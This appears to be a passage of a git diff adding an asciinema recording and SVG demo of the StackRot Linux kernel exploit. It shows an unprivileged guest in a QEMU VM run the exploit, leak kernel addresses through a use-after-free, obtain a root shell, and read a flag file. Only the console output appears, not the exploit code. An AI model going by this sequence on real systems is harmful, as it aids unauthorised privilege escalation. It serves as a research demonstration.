"012\\012i\\012"] +[18.057481, "o", "g\\012\\012rdu\\"] +[18.05753, "o", "012scq\\012"] +[18.057587, "o", "\\012etbq\\012"] +[18.057642, "o", "\\012\\012\\012"] +[18.057697, "o", "\\012\r\r\nb"] +[18.057751, "o", "c808e0000100c"] +[18.057781, "o", "d0-ffff"] +[18.057809, "o", "ffff r"] +[18.05784, "o", "wxs 00"] +[18.057876, "o", "000000 "] +[18.058009, "o", "00:00 0 "] +[18.058066, "o", " [vdso]\r\r\n"] +[18.058124, "o", "ffffffffff60"] +[18.058184, "o", "0000-ffffffff"] +[18.058235, "o", "ff601000 --"] +[18.058288, "o", "xp 00000000 "] +[18.058342, "o", "00:00 0 "] +[18.058392, "o", " "] +[18.058445, "o", " [vsyscal"] +[18.0585, "o", "l]\r\r\n\r\r\n"] +[18.058579, "o", "\u001b[32m[+] Pa"] +[18.058639, "o", "rsed from memory "] +[18.058696, "o", "maps: word "] +[18.058754, "o", "bc808e000010"] +[18.058809, "o", "0cd0, word "] +[18.058866, "o", "ffffffff"] +[18.058916, "o", "\r\r\n"] +[18.060371, "o", "\u001b[32m[+] Leak"] +[18.060401, "o", "ed c"] +[18.060429, "o", "ode ad"] +[18.060456, "o", "dress: "] +[18.060565, "o", "ffffffffbc800cd0\r"] +[18.060622, "o", "\r\n"] +[18.261768, "o", "\u001b[0m[ ] Trying w"] +[18.262006, "o", "ith free_t"] +[18.262138, "o", "iming_"] +[18.262262, "o", "msec"] +[18.262406, "o", "=50"] +[18.263165, "o", "\r\r\n"] +[18.32683, "o", "\u001b[0m[ ] UAF state update: \"free\" has been comple"] +[18.326887, "o", "ted\r\r\n"] +[18.351991, "o", "\u001b[0m[ ] UAF state update: \"use\" has been complet"] +[18.352041, "o", "ed\r\r\n"] +[18.377781, "o", "\\012\\012\\012\\012f\\012t\\012y\\012z\\012ae\\012\\012\\012\\012\\012\\012\\012\\012v\\0"] +[18.377829, "o", "12\\012a\\012\\012yo"] +[18.377859, "o", "\\012\\0"] +[18.377892, "o", "12\\012\\0"] +[18.377931, "o", "12\\012k"] +[18.377963, "o", "\\012\\012"] +[18.377996, "o", "o\\012\\01"] +[18.378027, "o", "2\\012h"] +[18.378058, "o", "\\012j\\0"] +[18.378088, "o", "12\\012"] +[18.378122, "o", "\\012\\012"] +[18.378156, "o", "ia\\012"] +[18.378196, "o", "\\012\\012j"] +[18.37823, "o", "p\\012\\0"] +[18.37826, "o", "12\\012\\0"] +[18.378289, "o", "12k\\012f"] +[18.378318, "o", "\\012g"] +[18.378348, "o", "\\012\\01"] +[18.378382, "o", "2\\012"] +[18.378418, "o", "\\012\\012\\"] +[18.378452, "o", "012\\012"] +[18.378483, "o", "om\\012ti"] +[18.378511, "o", "\\012\\01"] +[18.378539, "o", "2\\012\\"] +[18.378965, "o", "012f\\012\\012u\\012\\012g\\012\\012o\\012y\\012p\\012\\012\\012c\\012q\\012\\012\\012\\012cf\\012\\012p\\012t"] +[18.379156, "o", "\\012\\012\\012\\012\\012\\012\\012i\\012g\\012\\012rd"] +[18.37922, "o", "u\\012scq\\012\\01"] +[18.379277, "o", "2etbq\\012\\01"] +[18.379336, "o", "2\\012\\012\\012"] +[18.379394, "o", "\r\r\nffff8"] +[18.379453, "o", "9410bc63d58-0"] +[18.37951, "o", "000008c ---s 0"] +[18.379567, "o", "0000000 00:0"] +[18.379624, "o", "0 0 \r\r\nff"] +[18.379681, "o", "ffffffff600000"] +[18.379738, "o", "-ffffffffff6"] +[18.379791, "o", "01000 --xp "] +[18.379846, "o", "00000000 00:"] +[18.379899, "o", "00 0 "] +[18.379955, "o", " [vs"] +[18.380014, "o", "yscall]\r\r\n"] +[18.380071, "o", "\r\r\n\u001b[32m[+"] +[18.380125, "o", "] Parsed fr"] +[18.380184, "o", "om memory maps"] +[18.380238, "o", ": word f"] +[18.380269, "o", "fff8941"] +[18.3803, "o", "0bc63d58"] +[18.380332, "o", ", wor"] +[18.38037, "o", "d 8c"] +[18.380406, "o", "\r\r\n"] +[18.382534, "o", "\u001b[32m[+] Leake"] +[18.38257, "o", "d heap a"] +[18.3826, "o", "ddress:"] +[18.382629, "o", " "] +[18.382663, "o", "ffff89410b"] +[18.382691, "o", "c63d58"] +[18.382723, "o", "\r\r\n"] +[18.606885, "o", "\u001b[0m[ ] Trying with free_timing_msec=50\r\r\n"] +[18.664931, "o", "\u001b[0m[ ] UAF state update: \"free\" has been completed\r\r\n"] +[18.687037, "o", "\u001b[35m[*] Got root! Run /tmp/exp/as_root.sh\r\r\n\u001b[0m\u0000"] +[18.689255, "o", "\r\r\n/bin/sh\r\r\n"] +[18.689297, "o", "/bin/sh: can't access tty"] +[18.689322, "o", "; job"] +[18.689473, "o", " control turned off\r\r\n"] +[18.68951, "o", "sh: getcwd:"] +[18.689626, "o", " File"] +[18.689673, "o", "name too long\r\r\n(unknown) "] +[18.689786, "o", "# \u001b[6n"] +[20.08424, "o", "c"] +[20.284157, "o", "d"] +[20.360471, "o", " "] +[20.535501, "o", "/"] +[20.759812, "o", "\r\r\n"] +[20.760362, "o", "/ # \u001b[6n"] +[21.856448, "o", "w"] +[22.294736, "o", "h"] +[22.447266, "o", "o"] +[22.706371, "o", "a"] +[22.836824, "o", "m"] +[22.978726, "o", "i"] +[23.180178, "o", "\r\r\n"] +[23.180905, "o", "root\r\r\n"] +[23.181274, "o", "/ # \u001b[6n"] +[24.399818, "o", "l"] +[24.447417, "o", "s"] +[24.532067, "o", " "] +[24.858831, "o", "/"] +[24.982703, "o", "r"] +[25.117271, "o", "o"] +[25.226519, "o", "o"] +[25.283216, "o", "t"] +[25.373648, "o", " "] +[25.45593, "o", "-"] +[25.568748, "o", "a"] +[25.658969, "o", "l"] +[25.874866, "o", "\r\r\n"] +[25.875636, "o", "total 4\r\r\n"] +[25.875971, "o", "drwx"] +[25.876153, "o", "r-x--- 2 root 0"] +[25.876465, "o", " 60 J"] +[25.876748, "o", "ul 23 2023 \u001b[1;34m"] +[25.877015, "o", ".\u001b[m\r\r\ndrw"] +[25.877242, "o", "xr-xr-x 12 r"] +[25.877418, "o", "oot 0 "] +[25.877511, "o", " "] +[25.877581, "o", " "] +[25.877655, "o", "280 J"] +[25.877744, "o", "ul "] +[25.877819, "o", "23 20"] +[25.877894, "o", "23 \u001b["] +[25.877973, "o", "1;34m"] +[25.878049, "o", "..\u001b["] +[25.878119, "o", "m\r"] +[25.878192, "o", "\r\n"] +[25.878277, "o", "----"] +[25.878371, "o", "------"] +[25.878449, "o", " 1 "] +[25.878525, "o", "root"] +[25.878616, "o", " "] +[25.878683, "o", "0 "] +[25.878749, "o", " "] +[25.878826, "o", " "] +[25.878904, "o", " 44 "] +[25.878974, "o", "Jul "] +[25.879041, "o", "23 2"] +[25.879105, "o", "023 \u001b"] +[25.879167, "o", "[0;0"] +[25.879229, "o", "mfla"] +[25.879299, "o", "g\u001b[m"] +[25.880437, "o", "\r\r\n/ # \u001b[6n"] +[26.542948, "o", "c"] +[26.616409, "o", "a"] +[26.789251, "o", "t"] +[26.854233, "o", " "] +[27.043488, "o", "/"] +[27.178086, "o", "r"] +[27.298468, "o", "o"] +[27.422848, "o", "o"] +[27.482141, "o", "t"] +[27.81754, "o", "/"] +[27.926386, "o", "f"] +[28.058793, "o", "l"] +[28.140338, "o", "a"] +[28.270765, "o", "g"] +[28.739999, "o", "\r\r\n"] +[28.74056, "o", "flag{StackR0"] +[28.740701, "o", "t_hApp"] +[28.74081, "o", "y-eXp1"] +[28.741282, "o", "oit_53"] +[28.741513, "o", "103579874132}\r\r\n"] +[28.741702, "o", "/ # \u001b[6"] +[28.741805, "o", "n"] +[30.042318, "o", "\r\r\n"] +[30.042479, "o", "\r\r\npowerof"] +[30.042976, "o", "f -f\r\r\n"] +[30.06729, "o", "[ 27.390502] rebo"] +[30.067348, "o", "ot: Power down\r"] +[30.0676, "o", "\r\n"] +[30.177692, "o", "\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m \r \r"] +[30.257145, "o", "\u001b]0;ruihan@localhost: ~/projects/StackRot/exp\u0007"] +[30.27367, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\r\n\r\n\u001b[A\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m \u001b[0m\u001b[49m\u001b[38;5;31m \u001b[1m\u001b[38;5;31m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/projects/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mStackRot\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[38;5;39mexp\u001b[0m\u001b[38;5;39m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[49m \u001b[0m\u001b[38;5;31m\u001b[49m\u001b[38;5;178m\u001b[39mon \u001b[0m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;178m \u001b[38;5;76m master \u001b[38;5;178m!2\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[38;5;178m\u001b[0m\u001b[38;5;178m\u001b[49m\u001b[30m \u001b[0m\u001b[30m\u001b[49m\u001b[39m\u001b[38;5;244m······················································································\u001b[0m\u001b[38;5;244m\u001b[49m\u001b[30m \u001b[0m\u001b[30m\u001b[49m\u001b[38;5;101m\u001b[39mtook \u001b[0m\u001b[49m\u001b[38;5;101m 28s\u001b[0m\u001b[38;5;101m\u001b[49m\u001b[38;5;101m\u001b[0m\u001b[38;5;101m\u001b[49m\u001b[38;5;101m\u001b[0m\u001b[38;5;101m\u001b[49m\u001b[38;5;66m \u001b[39mat \u001b[0m\u001b[49m\u001b[38;5;66m 09:47:09 AM\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[38;5;66m\u001b[0m\u001b[38;5;66m\u001b[49m\u001b[39m\r\n\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[38;5;76m❯\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[38;5;76m\u001b[0m\u001b[38;5;76m\u001b[49m\u001b[30m\u001b[0m\u001b[30m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[?1h"] +[30.273977, "o", "\u001b[?2004h"] +[31.09336, "o", "\u001b[?2004l\r\r\n"] diff --git a/pic/demo.svg b/pic/demo.svg new file mode 100644 index 0000000..2e037ab --- /dev/null +++ b/pic/demo.svg @@ -0,0 +1 @@ +~/projects/StackRot/exponmaster!2·································································································at09:46:38AM-m3G-smp2-enable-kvm\-virtfslocal,path=../env/exp,mount_tag=exp,security_model=none\-nographic-no-rebootqemu-system-x86_64\-kernel../env/bzImage_upstream_6.1.25\-initrd../env/initramfs.cpio.gz\-append"quietconsole=ttyS0panic_on_warn=1"\SeaBIOS(versionArchLinux1.16.3-1-1)iPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD3180+BEF33180C900mount-tdevtmpfsnone/devmount-tprocnone/procmount-tsysfsnonemount-tsysfsnone/sysmount-ttmpfsnone/tmpmmkdir/tmp/expmount-t9pexp/tmp/expsuguest/tmp/exp/exploit.shexec/bin/sh/bin/sh:can'taccesstty;jobcontrolturnedoff/$/$whoamiguest/$ls/$ls/root/$ls/root-alls:can'topen'/root':Permissionls:can'topen'/root':Permissiondeniedtotal0/$cat/$cat/root/flagcat:can'topen'/root/flag':Permissiondenied/$/tmp/exp/exploit[][]Creating[]Creatingaverydeepf[]Creatingaverydeepfil[]Creatingaverydeepfile:0/65536[]Creatingaverydeepfile[]Creatingaverydeepfile:4096/65536[]Creatingave[]Creatingavery[]Creatingaveryd[]Creatingaveryde[]Creatingaverydeep[]Creatingaverydeepfile:8192/65536[]Creatinga[]Creatingav[]Creatingaverydee[]Creatingaverydeepfile:12288/65536[]Creatingaver[]Creatingaverydeepfile:[]Creatingaverydeepfile:16384/65536[]Creatingaverydeepfile:20480/65536[]Creatingaverydeepfi[]Creatingaverydeepfile:24576/65536[]Creatingaverydeepfile:28672/65536[]Creatingaverydeepfile:32768/65536[]Creatingaverydeepfile:36864/65536[]Creatingaverydeepfile:40960/65536[]Creatingaverydeepfile:45056/65536[]Creatingaverydeepfile:49152/65536[]Creatingaverydeepfile:53248/65536[]Creatingaverydeepfile:57344/65536[]Creatingaverydeepfile:61440/65536[+]Created[+]Createdthe[+]Createdthedeep[+]Createdthedeepfile[]Tryingw[]Tryingwithfree_timing_[]Tryingwithfree_timing_msec=0[]UAFstateupdate:"free"hasbeencomple[]UAFstateupdate:"free"hasbeencompleted[]UAFstateupdate:"use"hasbeencompleted\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\011\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\010\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01\0007e000-0007f000rw-p0000000000:0000007f000-00081000rw-p0000000000:000ffffffffff600000ffffffffff600000-ffffffffff601000--xp0000000000:000ffffffffff600000-ffffffffff601000--xp0000000000:000[vsyscall][-]Unsuccessfulexploittrial:Memorymapscontainthefourthline[+]Healcheckpassed:"Use"happensafter"free"[]Tryingwithfree_timing_msec=50\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01jbc808e0000100cd0-ffffffffrwxs0000000000:000[vdso][+]Parsedfrommemorymaps:wordbc808e0000100cd0,wordffffffff[+]Leakedcodeaddress:ffffffffbc800cd0ffff89410bc63d58-0000008c---s0000000000:000[+]Parsedfrommemorymaps:wordffff89410bc63d58,word8c[+]Leakedheapaddress:[+]Leakedheapaddress:ffff89410bc63d58[*]Gotroot!Run/tmp/exp/as_root.sh/bin/shsh:getcwd:Filenametoolong(unknown)#cd(unknown)#cd//#/#whoamiroot/#ls/#ls/root/#ls/root-altotal4drwxr-x---2root060Jul232023.drwxr-xr-x12root0drwxr-xr-x12root0280Jul232023drwxr-xr-x12root0280Jul232023..----------1root----------1root0----------1root044Jul232023----------1root044Jul232023flag/#cat/#cat/root/flagflag{StackR0t_hAppy-eXp1oit_53103579874132}poweroff-f[27.390502]reboot:Powerdown~/projects/StackRot/exponmaster!2······················································································took28sat09:47:09AMqqqemu-system-x86_64\-m3G-smp2-enable-kvm\-kernel../env/bzImage_upstream_6.1.25\-initrd../env/initramfs.cpio.gz\-append"quietconsole=ttyS0panic_on_warn=1"\-virtfslocal,path=../env/exp,mount_tag=exp,security_model=none\-nographic-no-rebootqemu-system-x86_64\-kernel../env/bzImage_upstream_6.1.25\-initrd../env/initramfs.cpio.gz\-append"quietconsole=ttyS0panic_on_warn=1"\SeaBIOSSeaBIOS(verSeaBIOS(versionSeaBIOS(versionArchLinuxSeaBIOS(versionArchLinux1.1SeaBIOS(versionArchLinux1.16.SeaBIOS(versionArchLinux1.16.3-SeaBIOS(versionArchLinux1.16.3-1-SeaBIOS(versionArchLinux1.16.3-1-1iPXEiPXE(http://ipxeiPXE(http://ipxe.org)00:03.iPXE(http://ipxe.org)00:03.0C900PCI2iPXE(http://ipxe.org)00:03.0C900PCI2.10iPXE(http://ipxe.org)00:03.0C900PCI2.10PniPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMiPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD318iPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD3180+BEF3318iPXE(http://ipxe.org)00:03.0C900PCI2.10PnPPMM+BEFD3180+BEF33180C90PPressPressCtrPressCtrl-PressCtrl-BtPressCtrl-BtoPressCtrl-BtoconPressCtrl-BtoconfiPressCtrl-BtoconfigurPressCtrl-BtoconfigurePressCtrl-BtoconfigureiPXPressCtrl-BtoconfigureiPXEPressCtrl-BtoconfigureiPXE(PPressCtrl-BtoconfigureiPXE(PCIPressCtrl-BtoconfigureiPXE(PCI00:PressCtrl-BtoconfigureiPXE(PCI00:03PressCtrl-BtoconfigureiPXE(PCI00:03.0)PressCtrl-BtoconfigureiPXE(PCI00:03.0)..PressCtrl-BtoconfigureiPXE(PCI00:03.0)...ssCtrl-BtoconfigureiPXE(PCI00:03.0)...Ctrl-BtoconfigureiPXE(PCI00:03.0)...rl-BtoconfigureiPXE(PCI00:03.0)...BtoconfigureiPXE(PCI00:03.0)...toconfigureiPXE(PCI00:03.0)...configureiPXE(PCI00:03.0)...nfigureiPXE(PCI00:03.0)...igureiPXE(PCI00:03.0)...reiPXE(PCI00:03.0)...iPXE(PCI00:03.0)...E(PCI00:03.0)...(PCI00:03.0)...CI00:03.0)...00:03.0)...:03.0)...3.0)...)....BBootBootinBootingBootingfroBootingfromRBootingfromROMBootingfromROM..mount-tprocnomount-tsysfsmount-tsysfsnmount-tsysfsnomount-tsysfsnone/symount-ttmpmount-ttmpfsmount-ttmpfsnmount-ttmpfsnomount-ttmpfsnone/tmmkmkdirmoumount-t9pexpmount-t9pexp/tmp/esusugusuguest/tmp/esuguest/tmp/exp/exeexec/bin//bin/s/bin/sh:can'tac/bin/sh:can'taccesstty;jo/bin/sh:can'taccesstty;jobcontroltu/$w/$wh/$who/$whoa/$whoam/$l/$ls//$ls/r/$ls/ro/$ls/roo/$ls/root-/$ls/root-als:can'tols:can'topen'ls:can'topen'/root':Permls:can'topen'/root':Permisls:can'topen'/root':Permissils:can'topen'/root':Permissiondeni/$c/$ca/$cat//$cat/r/$cat/ro/$cat/roo/$cat/root/$cat/root//$cat/root/f/$cat/root/fl/$cat/root/flacat:can'topencat:can'topen'/root/flag':cat:can'topen'/root/flag':Pe/$//$/t/$/tm/$/tmp/$/tmp//$/tmp/e/$/tmp/ex/$/tmp/exp/$/tmp/exp//$/tmp/exp/e/$/tmp/exp/ex/$/tmp/exp/exp/$/tmp/exp/expl/$/tmp/exp/explo/$/tmp/exp/exploi[]Creatin[]Creatingaverydeepfile:0/[]Creatingaverydeepfile:16384/6[[]Creat[]Creatingaverydeepfile:24576/6553[]Creatingaverydeepfile:28672/[]Cr[]Creatingaverydeepfile:36864[]Creatingaverydeepfile:409[]Creatingaverydeepfile:4096[]Creatingaverydeepfile:40960[]Creatingaverydeepfile:40960/[]Creatingaverydeepfile:40960/6[]Creatingaverydeepfile:40960/6553[]Creatingaverydeepfile:53248/65[+]Creat[+]Create[+]Createdth[+]Createdthed[+]Createdthedeepfi[+]Createdthedeepfil[]Tryingwit[]Tryingwithfree_timing_msec=[]UAF[]UAFstat[]UAFstate[]UAFstateupdate:"[]UAFstateupdate:"free"[]UAFstateupdate:"free"has[]UAFstateupdate:"free"hasbee[]UAFstateupdate:"free"hasbeenco\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\01\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\01\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01p\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01m\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01s00070007e0000007e000-000007e000-0007f000rw-p0007e000-0007f000rw-p000000000007e000-0007f000rw-p000000000000007f000-00080007f000-00081000007f000-00081000rw-p0007f000-00081000rw-p00000000007f000-00081000rw-p0000000000:ffffffffffffffffff6ffffffffff600000-fffffffffff600000-ffffffffff6010ffffffffff600000-ffffffffff60100ffffffffff600000-ffffffffff601000--xp00000ffffffffff600000-ffffffffff601000--xp000000000ffffffffff600000-ffffffffff601000--xp0000000000:000[vsysca[-]Unsucc[-]Unsucce[-]Unsuccessfulexp[-]Unsuccessfulexploittr[-]Unsuccessfulexploittrial:Mem[-]Unsuccessfulexploittrial:Memorymaps[-]Unsuccessfulexploittrial:Memorymapscontai[-]Unsuccessfulexploittrial:Memorymapscontainthefo[+][+]H[+]Healcheckpa[+]Healcheckpasse[+]Healcheckpassed:"Use"[+]Healcheckpassed:"Use"happensafter"\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012iabbc808e0000100cbc808e0000100cd0-ffffbc808e0000100cd0-ffffffffrbc808e0000100cd0-ffffffffrwxs00bc808e0000100cd0-ffffffffrwxs00000000bc808e0000100cd0-ffffffffrwxs0000000000:000ffffffffff60ffffffffff600000-ffffffffffffffffff600000-ffffffffff601000--ffffffffff600000-ffffffffff601000--xp00000000ffffffffff600000-ffffffffff601000--xp0000000000:000[vsyscal[+]Pa[+]Parsedfrommemory[+]Parsedfrommemorymaps:word[+]Parsedfrommemorymaps:wordbc808e000010[+]Parsedfrommemorymaps:wordbc808e0000100cd0,word[+]Leak[+]Leakedc[+]Leakedcodead[+]Leakedcodeaddress:[]Tryingwithfree_t[]Tryingwithfree_timing_msec[]UAFstateupdate:"use"hasbeencomplet\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\01\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\0\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01f\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01g\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01i\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01t\012\012\012\012f\012t\012y\012z\012ae\012\012\012\012\012\012\012\012v\012\012a\012\012yo\012\012\012\012\012k\012\012o\012\012\012h\012j\012\012\012\012ia\01dffff8ffff89410bc63d58-0ffff89410bc63d58-0000008c---s0ffff89410bc63d58-0000008c---s0000000000:0ffffffffffff600000-ffffffffff6ffffffffff600000-ffffffffff601000--xpffffffffff600000-ffffffffff601000--xp0000000000:ffffffffff600000-ffffffffff601000--xp0000000000:000[vs[+[+]Parsedfr[+]Parsedfrommemorymaps[+]Parsedfrommemorymaps:wordf[+]Parsedfrommemorymaps:wordffff8941[+]Parsedfrommemorymaps:wordffff89410bc63d58[+]Parsedfrommemorymaps:wordffff89410bc63d58,wor[+]Leake[+]Leakedheapa[+]Leakedheapaddress:ffff89410b/bin/sh:can'taccesstty/bin/sh:can'taccesstty;jobsh:getcwd:sh:getcwd:File(unknown)(unknown)#(unknown)#c/#w/#wh/#who/#whoa/#whoam/#l/#ls//#ls/r/#ls/ro/#ls/roo/#ls/root-/#ls/root-adrwxdrwxr-x---2root0drwxr-x---2root060Jdrwxr-x---2root060Jul232023drwdrwxr-xr-x12rdrwxr-xr-x12root0280Jdrwxr-xr-x12root0280Juldrwxr-xr-x12root0280Jul2320------------------------1----------1root044----------1root044Jul----------1root044Jul232----------1root044Jul232023fla/#c/#ca/#cat//#cat/r/#cat/ro/#cat/roo/#cat/root/#cat/root//#cat/root/f/#cat/root/fl/#cat/root/flaflag{StackR0flag{StackR0t_hAppflag{StackR0t_hAppy-eXp1flag{StackR0t_hAppy-eXp1oit_53powerof[27.390502]rebo \ No newline at end of file